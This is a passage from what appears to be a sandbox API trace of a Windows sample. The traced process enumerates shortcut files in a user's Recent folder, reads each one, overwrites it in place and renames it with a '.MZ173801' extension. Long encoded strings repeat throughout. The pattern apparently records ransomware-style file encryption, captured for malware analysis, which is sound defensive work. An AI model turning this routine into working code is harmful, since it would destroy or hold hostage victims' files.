NTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0109.372] GetCurrentThreadId () returned 0x1358 [0109.372] GetCurrentThreadId () returned 0x1358 [0109.372] GetCurrentThreadId () returned 0x1358 [0109.372] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\HPSq.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\hpsq.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0109.372] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0109.372] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0109.372] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x2f4 [0109.372] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0109.372] ReadFile (in: hFile=0x3f4, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x2f4, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x2f4, lpOverlapped=0x0) returned 1 [0109.373] CloseHandle (hObject=0x3f4) returned 1 [0109.373] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\HPSq.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\hpsq.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0109.374] WriteFile (in: hFile=0x3f4, lpBuffer=0x2433b60*, nNumberOfBytesToWrite=0x2f4, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2433b60*, lpNumberOfBytesWritten=0x19f9bc*=0x2f4, lpOverlapped=0x0) returned 1 [0109.374] CloseHandle (hObject=0x3f4) returned 1 [0109.375] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\HPSq.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\hpsq.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\HPSq.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\hpsq.lnk.mz173801")) returned 1 [0109.376] GetCurrentThreadId () returned 0x1358 [0109.376] GetCurrentThreadId () returned 0x1358 [0109.376] GetCurrentThreadId () returned 0x1358 [0109.376] GetCurrentThreadId () returned 0x1358 [0109.376] GetCurrentThreadId () returned 0x1358 [0109.376] GetCurrentThreadId () returned 0x1358 [0109.376] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb295f31, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xeb295f31, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xeb295f31, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x266, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="hrJq.lnk", cAlternateFileName="")) returned 1 [0109.376] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0109.376] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0109.376] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\hrJq.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\hrjq.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb295f31, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xeb295f31, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xeb295f31, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x266)) returned 1 [0109.377] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0109.377] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0109.377] GetCurrentThreadId () returned 0x1358 [0109.377] GetCurrentThreadId () returned 0x1358 [0109.377] GetCurrentThreadId () returned 0x1358 [0109.377] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0109.377] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0109.378] GetCurrentThreadId () returned 0x1358 [0109.378] GetCurrentThreadId () returned 0x1358 [0109.378] GetCurrentThreadId () returned 0x1358 [0109.378] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\hrJq.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\hrjq.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0109.378] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0109.378] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0109.378] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x266 [0109.378] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0109.378] ReadFile (in: hFile=0x3f4, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x266, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x266, lpOverlapped=0x0) returned 1 [0109.379] CloseHandle (hObject=0x3f4) returned 1 [0109.379] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\hrJq.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\hrjq.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0109.380] WriteFile (in: hFile=0x3f4, lpBuffer=0x2433b60*, nNumberOfBytesToWrite=0x266, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2433b60*, lpNumberOfBytesWritten=0x19f9bc*=0x266, lpOverlapped=0x0) returned 1 [0109.381] CloseHandle (hObject=0x3f4) returned 1 [0109.381] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\hrJq.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\hrjq.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\hrJq.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\hrjq.lnk.mz173801")) returned 1 [0109.408] GetCurrentThreadId () returned 0x1358 [0109.408] GetCurrentThreadId () returned 0x1358 [0109.408] GetCurrentThreadId () returned 0x1358 [0109.408] GetCurrentThreadId () returned 0x1358 [0109.408] GetCurrentThreadId () returned 0x1358 [0109.408] GetCurrentThreadId () returned 0x1358 [0109.408] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f810d3f, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x7f810d3f, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x7f8f6eea, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x3c9, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="HzRoNmrPEEYbe.lnk", cAlternateFileName="HZRONM~1.LNK")) returned 1 [0109.408] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0109.408] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0109.408] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\HzRoNmrPEEYbe.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\hzronmrpeeybe.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f810d3f, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x7f810d3f, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x7f8f6eea, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x3c9)) returned 1 [0109.409] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0109.409] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0109.409] GetCurrentThreadId () returned 0x1358 [0109.409] GetCurrentThreadId () returned 0x1358 [0109.409] GetCurrentThreadId () returned 0x1358 [0109.410] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0109.410] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 